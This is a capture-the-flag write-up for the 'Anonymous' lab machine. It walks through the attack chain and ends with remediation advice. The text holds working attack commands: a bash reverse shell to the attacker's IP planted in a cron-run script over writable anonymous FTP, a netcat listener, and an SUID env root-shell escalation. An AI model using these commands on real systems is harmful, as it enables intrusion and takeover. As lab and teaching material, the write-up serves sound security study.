Target IP: anonymous.thm (Requires /etc/hosts entry)
Difficulty: Medium (Conceptually) / Easy (Technically)
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
The “Anonymous” machine demonstrates the dangers of misconfigured file permissions and scheduled tasks. We gain initial access by exploiting an Anonymous FTP service that allows writing to a directory used by a system Cron Job. By replacing a maintenance script with a reverse shell payload, we gain execution as the user namelessone. Privilege escalation is trivial due to a misconfigured SUID binary (/usr/bin/env), allowing us to spawn a root shell immediately.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Nmap port/script scanning.
- T1078 (Valid Accounts): Anonymous FTP Access.
- T1053 (Scheduled Task/Job): Exploiting a Cron Job for execution.
- T1548 (Abuse Elevation Control Mechanism): SUID exploitation of
env.
2. Operational Setup
OpSec Note: “No tricks, just reality.” In a real engagement, you log everything.
Host Configuration
# Verify connection and map IP
ping -c 1 10.10.x.x
echo "10.10.x.x anonymous.thm" | sudo tee -a /etc/hostsWorkspace (Tmux)
- Pane 1 (Scanner): Nmap/SMBclient.
- Pane 2 (Listener):
nc -lvnp 4444. - Pane 3 (FTP): For file transfer and interaction.
3. Enumeration: “What do we see?”
A. Network Scanning
We start with Nmap. The output you provided is rich with information.
nmap -sC -sV -oA nmap/anonymous anonymous.thmAnalysis of Nmap Output:
-
21/tcp (FTP):
vsftpd 2.0.8. -
CRITICAL:
ftp-anon: Anonymous FTP login allowed. -
CRITICAL:
[NSE: writeable] ... scripts. -
Observation: Write access on an FTP server is a massive red flag.
-
22/tcp (SSH): Standard Ubuntu SSH.
-
139/445 (SMB): Samba is running.
smb-security-modeshowsauthentication_level: user, but guest access might be possible.
B. SMB Enumeration
Let’s check the SMB shares first to clear the low-hanging fruit.
smbclient -L //anonymous.thm/
# Enter blank passwordFindings:
- Share:
pics(Read Only). - Content:
corgo.jpg,puppy.jpg.
Rabbit Hole Check: In a real engagement, we download these.
smbclient //anonymous.thm/pics
mget *.jpg- Steganography? Running
steghide,binwalk, orstringson these images reveals nothing of value. This is likely a rabbit hole to distract us from the FTP service.
C. FTP Enumeration (The Vector)
Now, let’s look at that writable FTP directory.
ftp anonymous.thm
# User: anonymous, Pass: anonymous
cd scripts
ls -laWe see three files:
clean.shremoved_files.logto_do.txt
The Hypothesis:
We download clean.sh and inspect it.
cat clean.sh- Content: It looks like a script that cleans up the
/tmpdirectory. - Logic Check: If we see a script and a log file (
removed_files.log) that seems to be updating, this implies a Cron Job (Scheduled Task) is running this script periodically. - The Attack: Since Nmap told us we have Write Access, we don’t need to find an exploit for
vsftpd. We just replace the logic insideclean.shwith our own.
4. Initial Access: The Cron Job
We need to inject a reverse shell into clean.sh and upload it back to the server.
1. Create the Payload
On our attack machine, create a local file named clean.sh.
#!/bin/bash
bash -i >& /dev/tcp/10.10.YOUR.IP/4444 0>&12. Upload and Overwrite
Back in the FTP session:
put clean.sh
# Success! The file is overwritten.3. Execution (The Waiting Game)
Start your listener and wait. Cron jobs usually run every minute in CTFs.
nc -lvnp 4444…Wait 1-2 minutes…
Success: We catch a shell as namelessone.
5. Privilege Escalation: SUID
Enumeration
We are logged in. Now, “How do we own the box?” First, upgrade the shell (standard procedure).
python3 -c 'import pty; pty.spawn("/bin/bash")'Now, check for SUID binaries. These are files that execute with the permissions of the file owner (usually root).
find / -perm -u=s -type f 2>/dev/nullOutput:
/usr/bin/passwd
/usr/bin/env <-- ABNORMAL
/usr/bin/gpasswd
...Analysis: env
The env command is used to run a program in a modified environment. It should never have the SUID bit set. If it does, we can use it to spawn a shell, and that shell will inherit the SUID permissions (Root).
This is a classic GTFOBins vector.
Exploitation
/usr/bin/env /bin/sh -p/usr/bin/env: Runs the command./bin/sh: The shell we want.-p: Crucial. This tellsshnot to drop privileges. Without-p, Bash/Sh might drop the SUID privilege for security reasons.
Result:
# whoami
root6. Remediation (Blue Team)
How do we fix this?
- FTP Configuration:
- Disable Anonymous Uploads: In
/etc/vsftpd.conf, setanon_upload_enable=NOandwrite_enable=NOfor anonymous users. - Operational hygiene: Critical maintenance scripts should never be writable by the
ftpuser or world-writable.
- SUID Auditing:
- Remove the SUID bit from
env. It serves no administrative purpose. - Command:
chmod u-s /usr/bin/env.
- SMB Shares:
- Disable Guest access to shares unless publicly intended.